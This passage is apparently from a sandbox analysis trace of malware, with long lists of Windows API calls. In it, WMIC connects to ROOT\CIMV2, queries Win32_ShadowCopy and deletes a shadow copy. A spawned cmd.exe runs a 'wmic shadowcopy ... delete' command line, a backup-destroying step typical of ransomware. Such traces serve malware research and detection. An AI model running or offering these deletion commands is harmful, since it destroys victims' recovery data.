lpString2="DELETE", cchCount2=6) returned 2 [0089.966] malloc (_Size=0x18) returned 0x3bcc00 [0089.966] lstrlenA (lpString="") returned 0 [0089.966] malloc (_Size=0x2) returned 0x3cdfb0 [0089.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff4e314c, cbMultiByte=-1, lpWideCharStr=0x3cdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0089.966] free (_Block=0x3cdfb0) [0089.966] malloc (_Size=0x18) returned 0x3bcca0 [0089.966] lstrlenA (lpString="") returned 0 [0089.966] malloc (_Size=0x2) returned 0x3cdfb0 [0089.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff4e314c, cbMultiByte=-1, lpWideCharStr=0x3cdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0089.966] free (_Block=0x3cdfb0) [0089.966] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0089.967] malloc (_Size=0x3e) returned 0x3bd080 [0089.967] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0089.967] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0089.967] malloc (_Size=0x18) returned 0x3bcba0 [0089.967] free (_Block=0x3bcca0) [0089.967] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3f006e0007 | out: _String=0x0, _Context=0x3f006e0007) returned="*" [0089.967] lstrlenW (lpString="FROM") returned 4 [0089.967] lstrlenW (lpString="*") returned 1 [0089.967] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0089.967] malloc (_Size=0x18) returned 0x3bcca0 [0089.967] free (_Block=0x3bcba0) [0089.967] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x40006e0007 | out: _String=0x0, _Context=0x40006e0007) returned="from" [0089.967] lstrlenW (lpString="FROM") returned 4 [0089.967] lstrlenW (lpString="from") returned 4 [0089.967] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0089.967] malloc (_Size=0x18) returned 0x3bcba0 [0089.967] free (_Block=0x3bcca0) [0089.967] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x41006e0007 | out: _String=0x0, _Context=0x41006e0007) returned="Win32_ShadowCopy" [0089.967] malloc (_Size=0x18) returned 0x3bcca0 [0089.967] free (_Block=0x3bcba0) [0089.967] free (_Block=0x3bd080) [0089.967] malloc (_Size=0x18) returned 0x3bcba0 [0089.968] malloc (_Size=0x18) returned 0x3bcc20 [0089.968] malloc (_Size=0x18) returned 0x3bcc40 [0089.968] malloc (_Size=0x18) returned 0x3bcc60 [0089.968] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0089.968] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0089.968] malloc (_Size=0x18) returned 0x3bcc80 [0089.968] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0089.968] SysStringLen (param_1=" WHERE ") returned 0x7 [0089.968] malloc (_Size=0x18) returned 0x3bccc0 [0089.968] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ") returned 0x25 [0089.968] SysStringLen (param_1="ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'") returned 0x2b [0089.968] free (_Block=0x3bcc00) [0089.968] free (_Block=0x3bcc80) [0089.968] free (_Block=0x3bcc60) [0089.968] free (_Block=0x3bcc40) [0089.968] free (_Block=0x3bcc20) [0089.969] free (_Block=0x3bcba0) [0089.969] ??0CHString@@QEAA@XZ () returned 0x28f490 [0089.969] GetCurrentThreadId () returned 0xac8 [0089.969] malloc (_Size=0x18) returned 0x3bcba0 [0089.969] malloc (_Size=0x18) returned 0x3bcc20 [0089.969] malloc (_Size=0x18) returned 0x3bcc40 [0089.969] malloc (_Size=0x18) returned 0x3bcc60 [0089.969] malloc (_Size=0x18) returned 0x3bcc80 [0089.969] SysStringLen (param_1="\\\\") returned 0x2 [0089.969] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0089.969] malloc (_Size=0x18) returned 0x3bcc00 [0089.969] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0089.969] SysStringLen (param_1="\\") returned 0x1 [0089.969] malloc (_Size=0x18) returned 0x3bcce0 [0089.969] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0089.969] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0089.969] free (_Block=0x3bcc00) [0089.970] free (_Block=0x3bcc80) [0089.970] free (_Block=0x3bcc60) [0089.970] free (_Block=0x3bcc40) [0089.970] free (_Block=0x3bcc20) [0089.970] free (_Block=0x3bcba0) [0089.970] malloc (_Size=0x18) returned 0x3bcba0 [0089.970] malloc (_Size=0x18) returned 0x3bcc20 [0089.970] malloc (_Size=0x18) returned 0x3bcc40 [0089.970] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e51390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff5529d0 | out: ppNamespace=0xff5529d0*=0x1e63c18) returned 0x0 [0089.975] free (_Block=0x3bcc40) [0089.975] free (_Block=0x3bcc20) [0089.975] free (_Block=0x3bcba0) [0089.975] CoSetProxyBlanket (pProxy=0x1e63c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0089.976] free (_Block=0x3bcce0) [0089.976] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0089.976] ??0CHString@@QEAA@XZ () returned 0x28f3e0 [0089.976] GetCurrentThreadId () returned 0xac8 [0089.976] malloc (_Size=0x18) returned 0x3bcce0 [0089.976] lstrlenA (lpString="") returned 0 [0089.976] malloc (_Size=0x2) returned 0x3cdfb0 [0089.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff4e314c, cbMultiByte=-1, lpWideCharStr=0x3cdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0089.976] free (_Block=0x3cdfb0) [0089.976] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'") returned 0x50 [0089.976] SysStringLen (param_1="") returned 0x0 [0089.976] free (_Block=0x3bcce0) [0089.976] malloc (_Size=0x18) returned 0x3bcce0 [0089.976] IWbemServices:ExecQuery (in: This=0x1e63c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy WHERE ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'", lFlags=0, pCtx=0x0, ppEnum=0x28f3e8 | out: ppEnum=0x28f3e8*=0x1e63d18) returned 0x0 [0090.055] free (_Block=0x3bcce0) [0090.055] CoSetProxyBlanket (pProxy=0x1e63d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0090.058] IEnumWbemClassObject:Next (in: This=0x1e63d18, lTimeout=-1, uCount=0x1, apObjects=0x28f3f0, puReturned=0x28f400 | out: apObjects=0x28f3f0*=0x1e63d80, puReturned=0x28f400*=0x1) returned 0x0 [0090.059] malloc (_Size=0x18) returned 0x3bcce0 [0090.059] IWbemClassObject:Get (in: This=0x1e63d80, wszName="__PATH", lFlags=0, pVal=0x28f410*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x28f410*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0090.059] free (_Block=0x3bcce0) [0090.059] malloc (_Size=0x800) returned 0x3bd080 [0090.059] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x3bd080, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0090.059] FormatMessageW (in: dwFlags=0x2500, lpSource=0x3bd080, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x28f338, nSize=0x0, Arguments=0x28f348 | out: lpBuffer="뚐\x13") returned 0x67 [0090.059] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0090.059] malloc (_Size=0x68) returned 0x3bd890 [0090.059] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x3bd890, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0090.059] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff552ab0 [0090.059] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0090.060] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0090.060] free (_Block=0x3bd890) [0090.060] free (_Block=0x3bd080) [0090.060] LocalFree (hMem=0x13b690) returned 0x0 [0090.060] IWbemServices:DeleteInstance (in: This=0x1e63c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0091.235] IUnknown:Release (This=0x1e63d80) returned 0x0 [0091.235] malloc (_Size=0x800) returned 0x3bd080 [0091.235] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x3bd080, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0091.235] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0091.235] malloc (_Size=0x20) returned 0x3bcef0 [0091.235] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x3bcef0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0091.235] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff552ab0 [0091.235] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0091.235] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0091.235] free (_Block=0x3bcef0) [0091.235] free (_Block=0x3bd080) [0091.235] IEnumWbemClassObject:Next (in: This=0x1e63d18, lTimeout=-1, uCount=0x1, apObjects=0x28f3f0, puReturned=0x28f400 | out: apObjects=0x28f3f0*=0x0, puReturned=0x28f400*=0x0) returned 0x1 [0091.236] IUnknown:Release (This=0x1e63d18) returned 0x0 [0091.237] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0091.237] free (_Block=0x3bcca0) [0091.237] free (_Block=0x3bccc0) [0091.237] GetCurrentThreadId () returned 0xac8 [0091.237] ??0CHString@@QEAA@PEBG@Z () returned 0x28f5c8 [0091.237] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x28f5c8 [0091.237] lstrlenW (lpString="LIST") returned 4 [0091.237] lstrlenW (lpString="delete") returned 6 [0091.237] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0091.237] lstrlenW (lpString="ASSOC") returned 5 [0091.237] lstrlenW (lpString="delete") returned 6 [0091.237] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0091.237] lstrlenW (lpString="GET") returned 3 [0091.237] lstrlenW (lpString="delete") returned 6 [0091.237] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0091.237] ??1CHString@@QEAA@XZ () returned 0x2afa3501 [0091.237] WbemLocator:IUnknown:Release (This=0x1e63c18) returned 0x0 [0091.238] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0091.238] _kbhit () returned 0x0 [0091.238] free (_Block=0x3b6f20) [0091.238] free (_Block=0x3bcac0) [0091.238] free (_Block=0x3bcaa0) [0091.238] free (_Block=0x3bca80) [0091.238] free (_Block=0x3bca60) [0091.238] free (_Block=0x3b70a0) [0091.238] free (_Block=0x3bcb40) [0091.238] free (_Block=0x3b85c0) [0091.238] free (_Block=0x3bd020) [0091.238] free (_Block=0x3bcbc0) [0091.238] free (_Block=0x3bcfa0) [0091.239] free (_Block=0x3bcae0) [0091.239] free (_Block=0x3bcbe0) [0091.239] free (_Block=0x3b7140) [0091.239] free (_Block=0x3b6e00) [0091.239] free (_Block=0x3bcff0) [0091.239] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0091.239] free (_Block=0x3bce20) [0091.239] free (_Block=0x3bcb00) [0091.239] free (_Block=0x3bcb20) [0091.239] free (_Block=0x3bcf30) [0091.239] free (_Block=0x3bcb60) [0091.239] free (_Block=0x3b7ee0) [0091.239] free (_Block=0x3b7f30) [0091.239] free (_Block=0x3b7f80) [0091.239] free (_Block=0x3bcb80) [0091.239] free (_Block=0x3b6a20) [0091.239] free (_Block=0x3b6de0) [0091.239] free (_Block=0x3b8040) [0091.239] free (_Block=0x3b6dc0) [0091.239] free (_Block=0x3b8000) [0091.239] free (_Block=0x3b6d60) [0091.239] free (_Block=0x3b6d80) [0091.239] free (_Block=0x3b6c40) [0091.239] free (_Block=0x3b6c60) [0091.239] free (_Block=0x3b6be0) [0091.239] free (_Block=0x3b6c00) [0091.239] free (_Block=0x3b6ca0) [0091.239] free (_Block=0x3b6cc0) [0091.239] free (_Block=0x3b6d00) [0091.239] free (_Block=0x3b6d20) [0091.239] free (_Block=0x3b6b20) [0091.240] free (_Block=0x3b6b40) [0091.240] free (_Block=0x3b6ac0) [0091.240] free (_Block=0x3b6ae0) [0091.240] free (_Block=0x3b6b80) [0091.240] free (_Block=0x3b6ba0) [0091.240] free (_Block=0x3b6a60) [0091.240] free (_Block=0x3b6a80) [0091.240] free (_Block=0x3b69d0) [0091.240] free (_Block=0x3b69a0) [0091.240] free (_Block=0x3b6e90) [0091.240] WbemLocator:IUnknown:Release (This=0x1e51390) returned 0x2 [0091.240] WbemLocator:IUnknown:Release (This=0x1e63b28) returned 0x0 [0091.240] WbemLocator:IUnknown:Release (This=0x1e63a98) returned 0x0 [0091.241] WbemLocator:IUnknown:Release (This=0x1e51390) returned 0x1 [0091.241] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0091.241] WbemLocator:IUnknown:Release (This=0x1e51390) returned 0x0 [0091.241] free (_Block=0x3bc9e0) [0091.241] free (_Block=0x3bca00) [0091.241] free (_Block=0x3b8540) [0091.241] free (_Block=0x3bca20) [0091.241] free (_Block=0x3bca40) [0091.241] free (_Block=0x3b8580) [0091.241] free (_Block=0x3bc860) [0091.241] free (_Block=0x3bc880) [0091.241] free (_Block=0x3b83c0) [0091.241] free (_Block=0x3bc8a0) [0091.241] free (_Block=0x3bc8c0) [0091.241] free (_Block=0x3b8400) [0091.241] free (_Block=0x3bc7e0) [0091.241] free (_Block=0x3bc800) [0091.241] free (_Block=0x3b8340) [0091.241] free (_Block=0x3bc820) [0091.241] free (_Block=0x3bc840) [0091.241] free (_Block=0x3b8380) [0091.242] free (_Block=0x3bc960) [0091.242] free (_Block=0x3bc980) [0091.242] free (_Block=0x3b84c0) [0091.242] free (_Block=0x3bc9a0) [0091.242] free (_Block=0x3bc9c0) [0091.242] free (_Block=0x3b8500) [0091.242] free (_Block=0x3bc760) [0091.242] free (_Block=0x3bc780) [0091.242] free (_Block=0x3b82c0) [0091.242] free (_Block=0x3bc7a0) [0091.242] free (_Block=0x3bc7c0) [0091.242] free (_Block=0x3b8300) [0091.242] free (_Block=0x3bc8e0) [0091.242] free (_Block=0x3bc900) [0091.242] free (_Block=0x3b8440) [0091.242] free (_Block=0x3bc920) [0091.242] free (_Block=0x3bc940) [0091.242] free (_Block=0x3b8480) [0091.242] free (_Block=0x3bc6a0) [0091.242] free (_Block=0x3bc6c0) [0091.242] free (_Block=0x3b8200) [0091.242] free (_Block=0x3bc560) [0091.242] free (_Block=0x3bc580) [0091.242] free (_Block=0x3b80c0) [0091.242] free (_Block=0x3b6e50) [0091.242] free (_Block=0x3b6e70) [0091.243] free (_Block=0x3b8080) [0091.243] free (_Block=0x3bc5e0) [0091.243] free (_Block=0x3bc600) [0091.243] free (_Block=0x3b8140) [0091.243] free (_Block=0x3bc6e0) [0091.243] free (_Block=0x3bc700) [0091.243] free (_Block=0x3b8240) [0091.243] free (_Block=0x3bc5a0) [0091.243] free (_Block=0x3bc5c0) [0091.243] free (_Block=0x3b8100) [0091.243] free (_Block=0x3bc620) [0091.243] free (_Block=0x3bc640) [0091.243] free (_Block=0x3b8180) [0091.243] free (_Block=0x3bc660) [0091.243] free (_Block=0x3bc680) [0091.243] free (_Block=0x3b81c0) [0091.243] free (_Block=0x3bc720) [0091.243] free (_Block=0x3bc740) [0091.243] free (_Block=0x3b8280) [0091.243] CoUninitialize () [0091.628] exit (_Code=0) [0091.629] free (_Block=0x3bcd30) [0091.629] free (_Block=0x3b7ea0) [0091.629] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0091.629] free (_Block=0x3b6f40) [0091.629] free (_Block=0x3b6a40) [0091.629] free (_Block=0x3b7e60) [0091.629] free (_Block=0x3b7e20) [0091.629] free (_Block=0x3b7dd0) [0091.629] free (_Block=0x3b7d90) [0091.629] free (_Block=0x3b7d30) [0091.629] free (_Block=0x3b5a90) [0091.629] free (_Block=0x3b5a50) [0091.629] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0091.629] free (_Block=0x3bcec0) Thread: id = 124 os_tid = 0xb00 Thread: id = 125 os_tid = 0xa6c Thread: id = 126 os_tid = 0xa70 Thread: id = 127 os_tid = 0xabc Thread: id = 128 os_tid = 0xb10 Process: id = "14" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x12e0000" os_pid = "0xa64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaec" cmd_line = "cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 129 os_tid = 0xb5c [0091.715] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf790 | out: lpSystemTimeAsFileTime=0x1cf790*(dwLowDateTime=0x3e495d30, dwHighDateTime=0x1d68245)) [0091.715] GetCurrentProcessId () returned 0xa64 [0091.715] GetCurrentThreadId () returned 0xb5c [0091.715] GetTickCount () returned 0x114cb2c [0091.715] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf798 | out: lpPerformanceCount=0x1cf798*=21160794547) returned 1 [0091.718] GetModuleHandleW (lpModuleName=0x0) returned 0x4a620000 [0091.718] __set_app_type (_Type=0x1) [0091.718] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a647810) returned 0x0 [0091.718] __getmainargs (in: _Argc=0x4a66a608, _Argv=0x4a66a618, _Env=0x4a66a610, _DoWildCard=0, _StartInfo=0x4a64e0f4 | out: _Argc=0x4a66a608, _Argv=0x4a66a618, _Env=0x4a66a610) returned 0 [0091.719] GetCurrentThreadId () returned 0xb5c [0091.719] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb5c) returned 0x3c [0091.719] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0091.719] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0091.719] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0091.719] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0091.719] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cf728 | out: phkResult=0x1cf728*=0x0) returned 0x2 [0091.719] VirtualQuery (in: lpAddress=0x1cf710, lpBuffer=0x1cf690, dwLength=0x30 | out: lpBuffer=0x1cf690*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.719] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf690, dwLength=0x30 | out: lpBuffer=0x1cf690*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.720] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf690, dwLength=0x30 | out: lpBuffer=0x1cf690*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.720] VirtualQuery (in: lpAddress=0xd4000, lpBuffer=0x1cf690, dwLength=0x30 | out: lpBuffer=0x1cf690*(BaseAddress=0xd4000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.720] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf690, dwLength=0x30 | out: lpBuffer=0x1cf690*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30 [0091.720] GetConsoleOutputCP () returned 0x1b5 [0091.720] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a65bfe0 | out: lpCPInfo=0x4a65bfe0) returned 1 [0091.720] SetConsoleCtrlHandler (HandlerRoutine=0x4a643184, Add=1) returned 1 [0091.720] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.720] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0091.720] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.720] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a64e194 | out: lpMode=0x4a64e194) returned 1 [0091.721] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.721] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0091.721] _get_osfhandle (_FileHandle=0) returned 0x3 [0091.721] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a64e198 | out: lpMode=0x4a64e198) returned 1 [0091.721] _get_osfhandle (_FileHandle=0) returned 0x3 [0091.721] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0091.721] GetEnvironmentStringsW () returned 0x258b90* [0091.721] GetProcessHeap () returned 0x240000 [0091.721] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xa7c) returned 0x259620 [0091.721] FreeEnvironmentStringsW (penv=0x258b90) returned 1 [0091.721] GetProcessHeap () returned 0x240000 [0091.721] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x8) returned 0x258a10 [0091.722] GetEnvironmentStringsW () returned 0x258b90* [0091.722] GetProcessHeap () returned 0x240000 [0091.722] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xa7c) returned 0x25a0b0 [0091.722] FreeEnvironmentStringsW (penv=0x258b90) returned 1 [0091.722] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce5e8 | out: phkResult=0x1ce5e8*=0x44) returned 0x0 [0091.722] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce5e0, lpData=0x1ce600, lpcbData=0x1ce5e4*=0x1000 | out: lpType=0x1ce5e0*=0x0, lpData=0x1ce600*=0x18, lpcbData=0x1ce5e4*=0x1000) returned 0x2 [0091.722] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce5e0, lpData=0x1ce600, lpcbData=0x1ce5e4*=0x1000 | out: lpType=0x1ce5e0*=0x4, lpData=0x1ce600*=0x1, lpcbData=0x1ce5e4*=0x4) returned 0x0 [0091.722] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce5e0, lpData=0x1ce600, lpcbData=0x1ce5e4*=0x1000 | out: lpType=0x1ce5e0*=0x0, lpData=0x1ce600*=0x1, lpcbData=0x1ce5e4*=0x1000) returned 0x2 [0091.722] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce5e0, lpData=0x1ce600, lpcbData=0x1ce5e4*=0x1000 | out: lpType=0x1ce5e0*=0x4, lpData=0x1ce600*=0x0, lpcbData=0x1ce5e4*=0x4) returned 0x0 [0091.722] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce5e0, lpData=0x1ce600, lpcbData=0x1ce5e4*=0x1000 | out: lpType=0x1ce5e0*=0x4, lpData=0x1ce600*=0x40, lpcbData=0x1ce5e4*=0x4) returned 0x0 [0091.722] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce5e0, lpData=0x1ce600, lpcbData=0x1ce5e4*=0x1000 | out: lpType=0x1ce5e0*=0x4, lpData=0x1ce600*=0x40, lpcbData=0x1ce5e4*=0x4) returned 0x0 [0091.722] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce5e0, lpData=0x1ce600, lpcbData=0x1ce5e4*=0x1000 | out: lpType=0x1ce5e0*=0x0, lpData=0x1ce600*=0x40, lpcbData=0x1ce5e4*=0x1000) returned 0x2 [0091.722] RegCloseKey (hKey=0x44) returned 0x0 [0091.722] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce5e8 | out: phkResult=0x1ce5e8*=0x44) returned 0x0 [0091.722] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce5e0, lpData=0x1ce600, lpcbData=0x1ce5e4*=0x1000 | out: lpType=0x1ce5e0*=0x0, lpData=0x1ce600*=0x40, lpcbData=0x1ce5e4*=0x1000) returned 0x2 [0091.722] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce5e0, lpData=0x1ce600, lpcbData=0x1ce5e4*=0x1000 | out: lpType=0x1ce5e0*=0x4, lpData=0x1ce600*=0x1, lpcbData=0x1ce5e4*=0x4) returned 0x0 [0091.722] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce5e0, lpData=0x1ce600, lpcbData=0x1ce5e4*=0x1000 | out: lpType=0x1ce5e0*=0x0, lpData=0x1ce600*=0x1, lpcbData=0x1ce5e4*=0x1000) returned 0x2 [0091.722] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce5e0, 